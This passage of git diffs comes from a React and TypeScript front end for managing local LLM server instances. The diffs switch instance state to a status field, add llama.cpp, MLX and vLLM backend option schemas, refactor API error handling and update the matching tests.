<Input
id="name"
value={instanceName}
onChange={(e) => onNameChange(e.target.value)}
placeholder="my-instance"
disabled={isEditing}
className={nameError ? "border-red-500" : ""}
/>
{nameError && <p className="text-sm text-red-500">{nameError}</p>}
<p className="text-sm text-muted-foreground">
Unique identifier for the instance
</p>
</div>
{/* Auto Restart Configuration */}
<AutoRestartConfiguration
formData={formData}
onChange={onChange}
/>
{/* Basic Instance Options */}
<div className="space-y-4">
<h3 className="text-lg font-medium">Basic Instance Options</h3>
<NumberInput
id="idle_timeout"
label="Idle Timeout (minutes)"
value={formData.idle_timeout}
onChange={(value) => onChange('idle_timeout', value)}
placeholder="30"
description="Minutes before stopping an idle instance"
/>
<CheckboxInput
id="on_demand_start"
label="On Demand Start"
value={formData.on_demand_start}
onChange={(value) => onChange('on_demand_start', value)}
description="Start instance only when needed"
/>
<EnvironmentVariablesInput
id="environment"
label="Environment Variables"
value={formData.environment}
onChange={(value) => onChange('environment', value)}
description="Custom environment variables for the instance"
/>
</div>
</CardContent>
</Card>
)
}
export default InstanceSettingsCard

View File

@@ -112,9 +112,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
try {
setError(null)
await instancesApi.start(name)
// Update only this instance's running status
updateInstanceInMap(name, { running: true })
// Update only this instance's status
updateInstanceInMap(name, { status: "running" })
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to start instance')
}
@@ -124,9 +124,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
try {
setError(null)
await instancesApi.stop(name)
// Update only this instance's running status
updateInstanceInMap(name, { running: false })
// Update only this instance's status
updateInstanceInMap(name, { status: "stopped" })
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to stop instance')
}
@@ -136,9 +136,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
try {
setError(null)
await instancesApi.restart(name)
// Update only this instance's running status
updateInstanceInMap(name, { running: true })
// Update only this instance's status
updateInstanceInMap(name, { status: "running" })
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to restart instance')
}

View File

@@ -4,6 +4,7 @@ import type { ReactNode } from "react";
import { InstancesProvider, useInstances } from "@/contexts/InstancesContext";
import { instancesApi } from "@/lib/api";
import type { Instance } from "@/types/instance";
import { BackendType } from "@/types/instance";
import { AuthProvider } from "../AuthContext";
// Mock the API module
@@ -41,19 +42,19 @@ function TestComponent() {
<div data-testid="instances-count">{instances.length}</div>
{instances.map((instance) => (
<div key={instance.name} data-testid={`instance-${instance.name}`}>
{instance.name}:{instance.running.toString()}
{instance.name}:{instance.status}
</div>
))}
{/* Action buttons for testing with specific instances */}
<button
onClick={() => createInstance("new-instance", { model: "test.gguf" })}
onClick={() => createInstance("new-instance", { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "test.gguf" } })}
data-testid="create-instance"
>
Create Instance
</button>
<button
onClick={() => updateInstance("instance1", { model: "updated.gguf" })}
onClick={() => updateInstance("instance1", { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "updated.gguf" } })}
data-testid="update-instance"
>
Update Instance
@@ -99,8 +100,8 @@ function renderWithProvider(children: ReactNode) {
describe("InstancesContext", () => {
const mockInstances: Instance[] = [
{ name: "instance1", running: true, options: { model: "model1.gguf" } },
{ name: "instance2", running: false, options: { model: "model2.gguf" } },
{ name: "instance1", status: "running", options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "model1.gguf" } } },
{ name: "instance2", status: "stopped", options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "model2.gguf" } } },
];
beforeEach(() => {
@@ -132,10 +133,10 @@ describe("InstancesContext", () => {
expect(screen.getByTestId("loading")).toHaveTextContent("false");
expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
"instance1:true"
"instance1:running"
);
expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
"instance2:false"
"instance2:stopped"
);
});
});
@@ -158,8 +159,8 @@ describe("InstancesContext", () => {
it("creates instance and adds it to state", async () => {
const newInstance: Instance = {
name: "new-instance",
running: false,
options: { model: "test.gguf" },
status: "stopped",
options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "test.gguf" } },
};
vi.mocked(instancesApi.create).mockResolvedValue(newInstance);
@@ -174,14 +175,15 @@ describe("InstancesContext", () => {
await waitFor(() => {
expect(instancesApi.create).toHaveBeenCalledWith("new-instance", {
model: "test.gguf",
backend_type: BackendType.LLAMA_CPP,
backend_options: { model: "test.gguf" }
});
});
await waitFor(() => {
expect(screen.getByTestId("instances-count")).toHaveTextContent("3");
expect(screen.getByTestId("instance-new-instance")).toHaveTextContent(
"new-instance:false"
"new-instance:stopped"
);
});
});
@@ -214,8 +216,8 @@ describe("InstancesContext", () => {
it("updates instance and maintains it in state", async () => {
const updatedInstance: Instance = {
name: "instance1",
running: true,
options: { model: "updated.gguf" },
status: "running",
options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "updated.gguf" } },
};
vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance);
@@ -230,7 +232,8 @@ describe("InstancesContext", () => {
await waitFor(() => {
expect(instancesApi.update).toHaveBeenCalledWith("instance1", {
model: "updated.gguf",
backend_type: BackendType.LLAMA_CPP,
backend_options: { model: "updated.gguf" }
});
});
@@ -251,7 +254,7 @@ describe("InstancesContext", () => {
expect(screen.getByTestId("loading")).toHaveTextContent("false");
// instance2 starts as not running
expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
"instance2:false"
"instance2:stopped"
);
});
@@ -262,7 +265,7 @@ describe("InstancesContext", () => {
expect(instancesApi.start).toHaveBeenCalledWith("instance2");
// The running state should be updated to true
expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
"instance2:true"
"instance2:running"
);
});
});
@@ -276,7 +279,7 @@ describe("InstancesContext", () => {
expect(screen.getByTestId("loading")).toHaveTextContent("false");
// instance1 starts as running
expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
"instance1:true"
"instance1:running"
);
});
@@ -287,7 +290,7 @@ describe("InstancesContext", () => {
expect(instancesApi.stop).toHaveBeenCalledWith("instance1");
// The running state should be updated to false
expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
"instance1:false"
"instance1:stopped"
);
});
});
@@ -383,7 +386,7 @@ describe("InstancesContext", () => {
// Test that operations don't interfere with each other
const newInstance: Instance = {
name: "new-instance",
running: false,
status: "stopped",
options: {},
};
vi.mocked(instancesApi.create).mockResolvedValue(newInstance);
@@ -411,7 +414,7 @@ describe("InstancesContext", () => {
expect(screen.getByTestId("instances-count")).toHaveTextContent("3"); // Still 3
// But the running state should change
expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
"instance2:true"
"instance2:running"
);
});
});

View File

@@ -1,14 +1,19 @@
// ui/src/hooks/useInstanceHealth.ts
import { useState, useEffect } from 'react'
import type { HealthStatus } from '@/types/instance'
import type { HealthStatus, InstanceStatus } from '@/types/instance'
import { healthService } from '@/lib/healthService'
export function useInstanceHealth(instanceName: string, isRunning: boolean): HealthStatus | undefined {
export function useInstanceHealth(instanceName: string, instanceStatus: InstanceStatus): HealthStatus | undefined {
const [health, setHealth] = useState<HealthStatus | undefined>()
useEffect(() => {
if (!isRunning) {
setHealth(undefined)
if (instanceStatus === "stopped") {
setHealth({ status: "unknown", lastChecked: new Date() })
return
}
if (instanceStatus === "failed") {
setHealth({ status: instanceStatus, lastChecked: new Date() })
return
}
@@ -17,9 +22,9 @@ export function useInstanceHealth(instanceName: string, isRunning: boolean): Hea
setHealth(healthStatus)
})
// Cleanup subscription on unmount or when running changes
// Cleanup subscription on unmount or when instanceStatus changes
return unsubscribe
}, [instanceName, isRunning])
}, [instanceName, instanceStatus])
return health
}

View File

@@ -1,4 +1,5 @@
import type { CreateInstanceOptions, Instance } from "@/types/instance";
import { handleApiError } from "./errorUtils";
const API_BASE = "/api/v1";
@@ -30,25 +31,8 @@ async function apiCall<T>(
headers,
});
// Handle authentication errors
if (response.status === 401) {
throw new Error('Authentication required');
}
if (!response.ok) {
// Try to get error message from response
let errorMessage = `HTTP ${response.status}`;
try {
const errorText = await response.text();
if (errorText) {
errorMessage += `: ${errorText}`;
}
} catch {
// If we can't read the error, just use status
}
throw new Error(errorMessage);
}
// Handle errors using centralized error handler
await handleApiError(response);
// Handle empty responses (like DELETE)
if (response.status === 204) {
@@ -60,6 +44,14 @@ async function apiCall<T>(
const text = await response.text();
return text as T;
} else {
// Handle empty responses for JSON endpoints
const contentLength = response.headers.get('content-length');
if (contentLength === '0' || contentLength === null) {
const text = await response.text();
if (text.trim() === '') {
return {} as T; // Return empty object for empty JSON responses
}
}
const data = await response.json() as T;
return data;
}
@@ -71,16 +63,44 @@ async function apiCall<T>(
}
}
// Server API functions
// Server API functions (moved to llama-cpp backend)
export const serverApi = {
// GET /server/help
getHelp: () => apiCall<string>("/server/help", {}, "text"),
// GET /backends/llama-cpp/help
getHelp: () => apiCall<string>("/backends/llama-cpp/help", {}, "text"),
// GET /server/version
getVersion: () => apiCall<string>("/server/version", {}, "text"),
// GET /backends/llama-cpp/version
getVersion: () => apiCall<string>("/backends/llama-cpp/version", {}, "text"),
// GET /server/devices
getDevices: () => apiCall<string>("/server/devices", {}, "text"),
// GET /backends/llama-cpp/devices
getDevices: () => apiCall<string>("/backends/llama-cpp/devices", {}, "text"),
};
// Backend API functions
export const backendsApi = {
llamaCpp: {
// POST /backends/llama-cpp/parse-command
parseCommand: (command: string) =>
apiCall<CreateInstanceOptions>('/backends/llama-cpp/parse-command', {
method: 'POST',
body: JSON.stringify({ command }),
}),
},
mlx: {
// POST /backends/mlx/parse-command
parseCommand: (command: string) =>
apiCall<CreateInstanceOptions>('/backends/mlx/parse-command', {
method: 'POST',
body: JSON.stringify({ command }),
}),
},
vllm: {
// POST /backends/vllm/parse-command
parseCommand: (command: string) =>
apiCall<CreateInstanceOptions>('/backends/vllm/parse-command', {
method: 'POST',
body: JSON.stringify({ command }),
}),
},
};
// Instance API functions
@@ -136,5 +156,5 @@ export const instancesApi = {
},
// GET /instances/{name}/proxy/health
getHealth: (name: string) => apiCall<any>(`/instances/${name}/proxy/health`),
getHealth: (name: string) => apiCall<Record<string, unknown>>(`/instances/${name}/proxy/health`),
};

View File

@@ -0,0 +1,32 @@
/**
* Parses error response from API calls and returns a formatted error message
*/
export async function parseErrorResponse(response: Response): Promise<string> {
let errorMessage = `HTTP ${response.status}`
try {
const errorText = await response.text()
if (errorText) {
errorMessage += `: ${errorText}`
}
} catch {
// If we can't read the error, just use status
}
return errorMessage
}
/**
* Handles common API call errors and throws appropriate Error objects
*/
export async function handleApiError(response: Response): Promise<void> {
// Handle authentication errors
if (response.status === 401) {
throw new Error('Authentication required')
}
if (!response.ok) {
const errorMessage = await parseErrorResponse(response)
throw new Error(errorMessage)
}
}

View File

@@ -1,35 +1,24 @@
import { type CreateInstanceOptions, getAllFieldKeys } from '@/schemas/instanceOptions'
import {
type LlamaCppBackendOptions,
type MlxBackendOptions,
type VllmBackendOptions,
LlamaCppBackendOptionsSchema,
MlxBackendOptionsSchema,
VllmBackendOptionsSchema,
getAllLlamaCppFieldKeys,
getAllMlxFieldKeys,
getAllVllmFieldKeys,
getLlamaCppFieldType,
getMlxFieldType,
getVllmFieldType
} from '@/schemas/instanceOptions'
// Only define the basic fields we want to show by default
export const basicFieldsConfig: Record<string, {
// LlamaCpp backend-specific basic fields
const basicLlamaCppFieldsConfig: Record<string, {
label: string
description?: string
placeholder?: string
required?: boolean
}> = {
auto_restart: {
label: 'Auto Restart',
description: 'Automatically restart the instance on failure'
},
max_restarts: {
label: 'Max Restarts',
placeholder: '3',
description: 'Maximum number of restart attempts (0 = unlimited)'
},
restart_delay: {
label: 'Restart Delay (seconds)',
placeholder: '5',
description: 'Delay in seconds before attempting restart'
},
idle_timeout: {
label: 'Idle Timeout (minutes)',
placeholder: '60',
description: 'Time in minutes before instance is considered idle and stopped'
},
on_demand_start: {
label: 'On-Demand Start',
description: 'Start instance upon receiving OpenAI-compatible API request'
},
model: {
label: 'Model Path',
placeholder: '/path/to/model.gguf',
@@ -52,17 +41,135 @@ export const basicFieldsConfig: Record<string, {
}
}
export function isBasicField(key: keyof CreateInstanceOptions): boolean {
return key in basicFieldsConfig
// MLX backend-specific basic fields
const basicMlxFieldsConfig: Record<string, {
label: string
description?: string
placeholder?: string
}> = {
model: {
label: 'Model',
placeholder: 'mlx-community/Mistral-7B-Instruct-v0.3-4bit',
description: 'The path to the MLX model weights, tokenizer, and config'
},
temp: {
label: 'Temperature',
placeholder: '0.0',
description: 'Default sampling temperature (default: 0.0)'
},
top_p: {
label: 'Top-P',
placeholder: '1.0',
description: 'Default nucleus sampling top-p (default: 1.0)'
},
top_k: {
label: 'Top-K',
placeholder: '0',
description: 'Default top-k sampling (default: 0, disables top-k)'
},
min_p: {
label: 'Min-P',
placeholder: '0.0',
description: 'Default min-p sampling (default: 0.0, disables min-p)'
},
max_tokens: {
label: 'Max Tokens',
placeholder: '512',
description: 'Default maximum number of tokens to generate (default: 512)'
}
}
export function getBasicFields(): (keyof CreateInstanceOptions)[] {
return Object.keys(basicFieldsConfig) as (keyof CreateInstanceOptions)[]
// vLLM backend-specific basic fields
const basicVllmFieldsConfig: Record<string, {
label: string
description?: string
placeholder?: string
}> = {
model: {
label: 'Model',
placeholder: 'microsoft/DialoGPT-medium',
description: 'The name or path of the Hugging Face model to use'
},
tensor_parallel_size: {
label: 'Tensor Parallel Size',
placeholder: '1',
description: 'Number of GPUs to use for distributed serving'
},
gpu_memory_utilization: {
label: 'GPU Memory Utilization',
placeholder: '0.9',
description: 'The fraction of GPU memory to be used for the model executor'
}
}
export function getAdvancedFields(): (keyof CreateInstanceOptions)[] {
return getAllFieldKeys().filter(key => !isBasicField(key))
// Backend field configuration lookup
const backendFieldConfigs = {
mlx_lm: basicMlxFieldsConfig,
vllm: basicVllmFieldsConfig,
llama_cpp: basicLlamaCppFieldsConfig,
} as const
const backendFieldGetters = {
mlx_lm: getAllMlxFieldKeys,
vllm: getAllVllmFieldKeys,
llama_cpp: getAllLlamaCppFieldKeys,
} as const
export function getBasicBackendFields(backendType?: string): string[] {
const normalizedType = (backendType || 'llama_cpp') as keyof typeof backendFieldConfigs
const config = backendFieldConfigs[normalizedType] || basicLlamaCppFieldsConfig
return Object.keys(config)
}
export function getAdvancedBackendFields(backendType?: string): string[] {
const normalizedType = (backendType || 'llama_cpp') as keyof typeof backendFieldGetters
const fieldGetter = backendFieldGetters[normalizedType] || getAllLlamaCppFieldKeys
const basicConfig = backendFieldConfigs[normalizedType] || basicLlamaCppFieldsConfig
return fieldGetter().filter(key => !(key in basicConfig))
}
// Combined backend fields config for use in BackendFormField
export const basicBackendFieldsConfig: Record<string, {
label: string
description?: string
placeholder?: string
}> = {
...basicLlamaCppFieldsConfig,
...basicMlxFieldsConfig,
...basicVllmFieldsConfig
}
// Get field type for any backend option (union type)
export function getBackendFieldType(key: string): 'text' | 'number' | 'boolean' | 'array' {
// Try to get type from LlamaCpp schema first
try {
if (LlamaCppBackendOptionsSchema.shape && key in LlamaCppBackendOptionsSchema.shape) {
return getLlamaCppFieldType(key as keyof LlamaCppBackendOptions)
}
} catch {
// Schema might not be available
}
// Try MLX schema
try {
if (MlxBackendOptionsSchema.shape && key in MlxBackendOptionsSchema.shape) {
return getMlxFieldType(key as keyof MlxBackendOptions)
}
} catch {
// Schema might not be available
}
// Try vLLM schema
try {
if (VllmBackendOptionsSchema.shape && key in VllmBackendOptionsSchema.shape) {
return getVllmFieldType(key as keyof VllmBackendOptions)
}
} catch {
// Schema might not be available
}
// Default fallback
return 'text'
}
// Re-export the Zod-based functions
export { getFieldType } from '@/schemas/instanceOptions'

View File

@@ -0,0 +1,4 @@
// Re-export all backend schemas from one place
export * from './llamacpp'
export * from './mlx'
export * from './vllm'

View File

@@ -0,0 +1,192 @@
import { z } from 'zod'
// Define the LlamaCpp backend options schema
export const LlamaCppBackendOptionsSchema = z.object({
// Common params
verbose_prompt: z.boolean().optional(),
threads: z.number().optional(),
threads_batch: z.number().optional(),
cpu_mask: z.string().optional(),
cpu_range: z.string().optional(),
cpu_strict: z.number().optional(),
prio: z.number().optional(),
poll: z.number().optional(),
cpu_mask_batch: z.string().optional(),
cpu_range_batch: z.string().optional(),
cpu_strict_batch: z.number().optional(),
prio_batch: z.number().optional(),
poll_batch: z.number().optional(),
ctx_size: z.number().optional(),
predict: z.number().optional(),
batch_size: z.number().optional(),
ubatch_size: z.number().optional(),
keep: z.number().optional(),
flash_attn: z.boolean().optional(),
no_perf: z.boolean().optional(),
escape: z.boolean().optional(),
no_escape: z.boolean().optional(),
rope_scaling: z.string().optional(),
rope_scale: z.number().optional(),
rope_freq_base: z.number().optional(),
rope_freq_scale: z.number().optional(),
yarn_orig_ctx: z.number().optional(),
yarn_ext_factor: z.number().optional(),
yarn_attn_factor: z.number().optional(),
yarn_beta_slow: z.number().optional(),
yarn_beta_fast: z.number().optional(),
dump_kv_cache: z.boolean().optional(),
no_kv_offload: z.boolean().optional(),
cache_type_k: z.string().optional(),
cache_type_v: z.string().optional(),
defrag_thold: z.number().optional(),
parallel: z.number().optional(),
mlock: z.boolean().optional(),
no_mmap: z.boolean().optional(),
numa: z.string().optional(),
device: z.string().optional(),
override_tensor: z.array(z.string()).optional(),
gpu_layers: z.number().optional(),
split_mode: z.string().optional(),
tensor_split: z.string().optional(),
main_gpu: z.number().optional(),
check_tensors: z.boolean().optional(),
override_kv: z.array(z.string()).optional(),
lora: z.array(z.string()).optional(),
lora_scaled: z.array(z.string()).optional(),
control_vector: z.array(z.string()).optional(),
control_vector_scaled: z.array(z.string()).optional(),
control_vector_layer_range: z.string().optional(),
model: z.string().optional(),
model_url: z.string().optional(),
hf_repo: z.string().optional(),
hf_repo_draft: z.string().optional(),
hf_file: z.string().optional(),
hf_repo_v: z.string().optional(),
hf_file_v: z.string().optional(),
hf_token: z.string().optional(),
log_disable: z.boolean().optional(),
log_file: z.string().optional(),
log_colors: z.boolean().optional(),
verbose: z.boolean().optional(),
verbosity: z.number().optional(),
log_prefix: z.boolean().optional(),
log_timestamps: z.boolean().optional(),
// Sampling params
samplers: z.string().optional(),
seed: z.number().optional(),
sampling_seq: z.string().optional(),
ignore_eos: z.boolean().optional(),
temp: z.number().optional(),
top_k: z.number().optional(),
top_p: z.number().optional(),
min_p: z.number().optional(),
xtc_probability: z.number().optional(),
xtc_threshold: z.number().optional(),
typical: z.number().optional(),
repeat_last_n: z.number().optional(),
repeat_penalty: z.number().optional(),
presence_penalty: z.number().optional(),
frequency_penalty: z.number().optional(),
dry_multiplier: z.number().optional(),
dry_base: z.number().optional(),
dry_allowed_length: z.number().optional(),
dry_penalty_last_n: z.number().optional(),
dry_sequence_breaker: z.array(z.string()).optional(),
dynatemp_range: z.number().optional(),
dynatemp_exp: z.number().optional(),
mirostat: z.number().optional(),
mirostat_lr: z.number().optional(),
mirostat_ent: z.number().optional(),
logit_bias: z.array(z.string()).optional(),
grammar: z.string().optional(),
grammar_file: z.string().optional(),
json_schema: z.string().optional(),
json_schema_file: z.string().optional(),
// Example-specific params
no_context_shift: z.boolean().optional(),
special: z.boolean().optional(),
no_warmup: z.boolean().optional(),
spm_infill: z.boolean().optional(),
pooling: z.string().optional(),
cont_batching: z.boolean().optional(),
no_cont_batching: z.boolean().optional(),
mmproj: z.string().optional(),
mmproj_url: z.string().optional(),
no_mmproj: z.boolean().optional(),
no_mmproj_offload: z.boolean().optional(),
alias: z.string().optional(),
host: z.string().optional(),
port: z.number().optional(),
path: z.string().optional(),
no_webui: z.boolean().optional(),
embedding: z.boolean().optional(),
reranking: z.boolean().optional(),
api_key: z.string().optional(),
api_key_file: z.string().optional(),
ssl_key_file: z.string().optional(),
ssl_cert_file: z.string().optional(),
chat_template_kwargs: z.string().optional(),
timeout: z.number().optional(),
threads_http: z.number().optional(),
cache_reuse: z.number().optional(),
metrics: z.boolean().optional(),
slots: z.boolean().optional(),
props: z.boolean().optional(),
no_slots: z.boolean().optional(),
slot_save_path: z.string().optional(),
jinja: z.boolean().optional(),
reasoning_format: z.string().optional(),
reasoning_budget: z.number().optional(),
chat_template: z.string().optional(),
chat_template_file: z.string().optional(),
no_prefill_assistant: z.boolean().optional(),
slot_prompt_similarity: z.number().optional(),
lora_init_without_apply: z.boolean().optional(),
draft_max: z.number().optional(),
draft_min: z.number().optional(),
draft_p_min: z.number().optional(),
ctx_size_draft: z.number().optional(),
device_draft: z.string().optional(),
gpu_layers_draft: z.number().optional(),
model_draft: z.string().optional(),
cache_type_k_draft: z.string().optional(),
cache_type_v_draft: z.string().optional(),
// Audio/TTS params
model_vocoder: z.string().optional(),
tts_use_guide_tokens: z.boolean().optional(),
// Default model params
embd_bge_small_en_default: z.boolean().optional(),
embd_e5_small_en_default: z.boolean().optional(),
embd_gte_small_default: z.boolean().optional(),
fim_qwen_1_5b_default: z.boolean().optional(),
fim_qwen_3b_default: z.boolean().optional(),
fim_qwen_7b_default: z.boolean().optional(),
fim_qwen_7b_spec: z.boolean().optional(),
fim_qwen_14b_spec: z.boolean().optional(),
})
// Infer the TypeScript type from the schema
export type LlamaCppBackendOptions = z.infer<typeof LlamaCppBackendOptionsSchema>
// Helper to get all LlamaCpp backend option field keys
export function getAllLlamaCppFieldKeys(): (keyof LlamaCppBackendOptions)[] {
return Object.keys(LlamaCppBackendOptionsSchema.shape) as (keyof LlamaCppBackendOptions)[]
}
// Get field type for LlamaCpp backend options
export function getLlamaCppFieldType(key: keyof LlamaCppBackendOptions): 'text' | 'number' | 'boolean' | 'array' {
const fieldSchema = LlamaCppBackendOptionsSchema.shape[key]
if (!fieldSchema) return 'text'
// Handle ZodOptional wrapper
const innerSchema = fieldSchema instanceof z.ZodOptional ? fieldSchema.unwrap() : fieldSchema
if (innerSchema instanceof z.ZodBoolean) return 'boolean'
if (innerSchema instanceof z.ZodNumber) return 'number'
if (innerSchema instanceof z.ZodArray) return 'array'
return 'text' // ZodString and others default to text
}

View File

@@ -0,0 +1,51 @@
import { z } from 'zod'
// Define the MLX backend options schema
export const MlxBackendOptionsSchema = z.object({
// Basic connection options
model: z.string().optional(),
host: z.string().optional(),
port: z.number().optional(),
// Model and adapter options
adapter_path: z.string().optional(),
draft_model: z.string().optional(),
num_draft_tokens: z.number().optional(),
trust_remote_code: z.boolean().optional(),
// Logging and templates
log_level: z.enum(['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL']).optional(),
chat_template: z.string().optional(),
use_default_chat_template: z.boolean().optional(),
chat_template_args: z.string().optional(), // JSON string
// Sampling defaults
temp: z.number().optional(), // Note: MLX uses "temp" not "temperature"
top_p: z.number().optional(),
top_k: z.number().optional(),
min_p: z.number().optional(),
max_tokens: z.number().optional(),
})
// Infer the TypeScript type from the schema
export type MlxBackendOptions = z.infer<typeof MlxBackendOptionsSchema>
// Helper to get all MLX backend option field keys
export function getAllMlxFieldKeys(): (keyof MlxBackendOptions)[] {
return Object.keys(MlxBackendOptionsSchema.shape) as (keyof MlxBackendOptions)[]
}
// Get field type for MLX backend options
export function getMlxFieldType(key: keyof MlxBackendOptions): 'text' | 'number' | 'boolean' | 'array' {
const fieldSchema = MlxBackendOptionsSchema.shape[key]
if (!fieldSchema) return 'text'
// Handle ZodOptional wrapper
const innerSchema = fieldSchema instanceof z.ZodOptional ? fieldSchema.unwrap() : fieldSchema
if (innerSchema instanceof z.ZodBoolean) return 'boolean'
if (innerSchema instanceof z.ZodNumber) return 'number'
if (innerSchema instanceof z.ZodArray) return 'array'
if (innerSchema instanceof z.ZodEnum) return 'text' // Enum treated as text/select
return 'text' // ZodString and others default to text
}

View File

@@ -0,0 +1,150 @@
import { z } from 'zod'
// Define the vLLM backend options schema
export const VllmBackendOptionsSchema = z.object({
// Basic connection options (auto-assigned by llamactl)
host: z.string().optional(),
port: z.number().optional(),
// Model and engine configuration
model: z.string().optional(),
tokenizer: z.string().optional(),
skip_tokenizer_init: z.boolean().optional(),
revision: z.string().optional(),
code_revision: z.string().optional(),
tokenizer_revision: z.string().optional(),
tokenizer_mode: z.string().optional(),
trust_remote_code: z.boolean().optional(),
download_dir: z.string().optional(),
load_format: z.string().optional(),
config_format: z.string().optional(),
dtype: z.string().optional(),
kv_cache_dtype: z.string().optional(),
quantization_param_path: z.string().optional(),
seed: z.number().optional(),
max_model_len: z.number().optional(),
guided_decoding_backend: z.string().optional(),
distributed_executor_backend: z.string().optional(),
worker_use_ray: z.boolean().optional(),
ray_workers_use_nsight: z.boolean().optional(),
// Performance and serving configuration
block_size: z.number().optional(),
enable_prefix_caching: z.boolean().optional(),
disable_sliding_window: z.boolean().optional(),
use_v2_block_manager: z.boolean().optional(),
num_lookahead_slots: z.number().optional(),
swap_space: z.number().optional(),
cpu_offload_gb: z.number().optional(),
gpu_memory_utilization: z.number().optional(),
num_gpu_blocks_override: z.number().optional(),
max_num_batched_tokens: z.number().optional(),
max_num_seqs: z.number().optional(),
max_logprobs: z.number().optional(),
disable_log_stats: z.boolean().optional(),
quantization: z.string().optional(),
rope_scaling: z.string().optional(),
rope_theta: z.number().optional(),
enforce_eager: z.boolean().optional(),
max_context_len_to_capture: z.number().optional(),
max_seq_len_to_capture: z.number().optional(),
disable_custom_all_reduce: z.boolean().optional(),
tokenizer_pool_size: z.number().optional(),
tokenizer_pool_type: z.string().optional(),
tokenizer_pool_extra_config: z.string().optional(),
enable_lora_bias: z.boolean().optional(),
lora_extra_vocab_size: z.number().optional(),
lora_rank: z.number().optional(),
prompt_lookback_distance: z.number().optional(),
preemption_mode: z.string().optional(),
// Distributed and parallel processing
tensor_parallel_size: z.number().optional(),
pipeline_parallel_size: z.number().optional(),
max_parallel_loading_workers: z.number().optional(),
disable_async_output_proc: z.boolean().optional(),
worker_class: z.string().optional(),
enabled_lora_modules: z.string().optional(),
max_lora_rank: z.number().optional(),
fully_sharded_loras: z.boolean().optional(),
lora_modules: z.string().optional(),
prompt_adapters: z.string().optional(),
max_prompt_adapter_token: z.number().optional(),
device: z.string().optional(),
scheduler_delay: z.number().optional(),
enable_chunked_prefill: z.boolean().optional(),
speculative_model: z.string().optional(),
speculative_model_quantization: z.string().optional(),
speculative_revision: z.string().optional(),
speculative_max_model_len: z.number().optional(),
speculative_disable_by_batch_size: z.number().optional(),
ngpt_speculative_length: z.number().optional(),
speculative_disable_mqa: z.boolean().optional(),
model_loader_extra_config: z.string().optional(),
ignore_patterns: z.string().optional(),
preloaded_lora_modules: z.string().optional(),
// OpenAI server specific options
uds: z.string().optional(),
uvicorn_log_level: z.string().optional(),
response_role: z.string().optional(),
ssl_keyfile: z.string().optional(),
ssl_certfile: z.string().optional(),
ssl_ca_certs: z.string().optional(),
ssl_cert_reqs: z.number().optional(),
root_path: z.string().optional(),
middleware: z.array(z.string()).optional(),
return_tokens_as_token_ids: z.boolean().optional(),
disable_frontend_multiprocessing: z.boolean().optional(),
enable_auto_tool_choice: z.boolean().optional(),
tool_call_parser: z.string().optional(),
tool_server: z.string().optional(),
chat_template: z.string().optional(),
chat_template_content_format: z.string().optional(),
allow_credentials: z.boolean().optional(),
allowed_origins: z.array(z.string()).optional(),
allowed_methods: z.array(z.string()).optional(),
allowed_headers: z.array(z.string()).optional(),
api_key: z.array(z.string()).optional(),
enable_log_outputs: z.boolean().optional(),
enable_token_usage: z.boolean().optional(),
enable_async_engine_debug: z.boolean().optional(),
engine_use_ray: z.boolean().optional(),
disable_log_requests: z.boolean().optional(),
max_log_len: z.number().optional(),
// Additional engine configuration
task: z.string().optional(),
multi_modal_config: z.string().optional(),
limit_mm_per_prompt: z.string().optional(),
enable_sleep_mode: z.boolean().optional(),
enable_chunking_request: z.boolean().optional(),
compilation_config: z.string().optional(),
disable_sliding_window_mask: z.boolean().optional(),
enable_trtllm_engine_latency: z.boolean().optional(),
override_pooling_config: z.string().optional(),
override_neuron_config: z.string().optional(),
override_kv_cache_align_size: z.number().optional(),
})
// Infer the TypeScript type from the schema
export type VllmBackendOptions = z.infer<typeof VllmBackendOptionsSchema>
// Helper to get all vLLM backend option field keys
export function getAllVllmFieldKeys(): (keyof VllmBackendOptions)[] {
return Object.keys(VllmBackendOptionsSchema.shape) as (keyof VllmBackendOptions)[]
}
// Get field type for vLLM backend options
export function getVllmFieldType(key: keyof VllmBackendOptions): 'text' | 'number' | 'boolean' | 'array' {
const fieldSchema = VllmBackendOptionsSchema.shape[key]
if (!fieldSchema) return 'text'
// Handle ZodOptional wrapper
const innerSchema = fieldSchema instanceof z.ZodOptional ? fieldSchema.unwrap() : fieldSchema
if (innerSchema instanceof z.ZodBoolean) return 'boolean'
if (innerSchema instanceof z.ZodNumber) return 'number'
if (innerSchema instanceof z.ZodArray) return 'array'
return 'text' // ZodString and others default to text
}

View File

@@ -1,6 +1,30 @@
import { BackendType } from '@/types/instance'
import { z } from 'zod'
// Define the Zod schema
// Import backend schemas from separate files
import {
LlamaCppBackendOptionsSchema,
type LlamaCppBackendOptions,
getAllLlamaCppFieldKeys,
getLlamaCppFieldType,
MlxBackendOptionsSchema,
type MlxBackendOptions,
getAllMlxFieldKeys,
getMlxFieldType,
VllmBackendOptionsSchema,
type VllmBackendOptions,
getAllVllmFieldKeys,
getVllmFieldType
} from './backends'
// Backend options union
export const BackendOptionsSchema = z.union([
LlamaCppBackendOptionsSchema,
MlxBackendOptionsSchema,
VllmBackendOptionsSchema,
])
// Define the main create instance options schema
export const CreateInstanceOptionsSchema = z.object({
// Restart options
auto_restart: z.boolean().optional(),
@@ -9,191 +33,51 @@ export const CreateInstanceOptionsSchema = z.object({
idle_timeout: z.number().optional(),
on_demand_start: z.boolean().optional(),
// Common params
verbose_prompt: z.boolean().optional(),
threads: z.number().optional(),
